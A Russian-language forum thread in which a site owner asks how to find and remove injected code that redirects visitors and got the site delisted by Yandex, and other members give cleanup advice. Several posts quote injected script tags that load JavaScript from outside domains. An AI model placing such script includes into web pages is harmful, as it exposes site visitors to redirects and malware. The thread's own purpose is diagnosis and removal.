• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.     Помогите модератору этого раздела killoff лично.

Помощь Внедрение вредоносного кода

Статус
В этой теме нельзя размещать новые ответы.
GIwild

GIwild

Постоялец
Регистрация
6 Май 2006
Сообщения
116
Реакции
8
Здравствуйте, возникла следующая проблема:

яндекс выкинул сайт из поиска, я им написал письмо и получил ответ, что в структуре сайта находится вредоносный код, который ведет на другой сайт, захожу на сайт как обычно все нормально, а сегодня попробовал через Для просмотра ссылки Войди или Зарегистрируйся и точно при переходе выкидывает на вот этот Для просмотра ссылки Войди или Зарегистрируйся

уважаемые подскажите какие файлы нужно смотреть и что туда могли внедрить?

Всем за ранее спасибо!!!
 
Очень похоже, что установлен Модуль Переходы старой версии в котором есть дыры
 
Стояла версия переходы 8.7 удалил все полностью что касалось этого модуля, проблема осталась :(
 
Просмотрите код страницы на наличие постороннего кода по типу
HTML: 
<script src=http://oj1p.narod.ru/t.js></script>
 
Если смотреть через оперу исходный код, то нашел следующее
HTML: 
<body><script src=http://promediagroup.ru/d.js></script><!--<div id="loading-layer" style="display:none"><div id="loading-layer-text">Загрузка. Пожалуйста, подождите...</div></div>

но когда смотрю просто файл main.tpl то вижу только вот этот код
HTML: 
<body>{AJAX}

откуда появилась эта херь и как ее убрать

HTML: 
<script src=http://promediagroup.ru/d.js></script>
 
Посмотрите в файле index.php - вероятнее всего код именно там
 
  • Заблокирован
  • #7
скачай файли движка на комп себе и поисчи promediagroup.ru по всем файлам, но лучше всего замени все файли движка на чистие копии
 
не обязательно в файлах движка - могли и в базу запросто записать,

а просто менять файлы на читые лучше не надо найди сначала где урл находится с помощью простого тотал командера бесплатного (скачаешь и ищешь там даже функции поиска есть в файлах разные) и почисти + закрой дырки :) а то снова появится эта дрянь (ко мне на один новостийник так раз 5 заливали - пока я ленился заплатки поставить :D)
 
открой Index.php в корне и там в само низу дожен быть этот код, у меня сегодня на одном са1те тож нашел такой.
Хрен знает как его ломают, но дыры где то есть.
 
Лучше с бекапа восстановить, сменить пароли (админка, хостинг, БД) и обновить версию, чтобы дыры закрыть. Танцы с кодом в файлах - долго, инфицируются как правило все файлы *.js и *.php (был случай). А вот если в БД вирус или ссылка на вирус - это вообще как лечить?
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху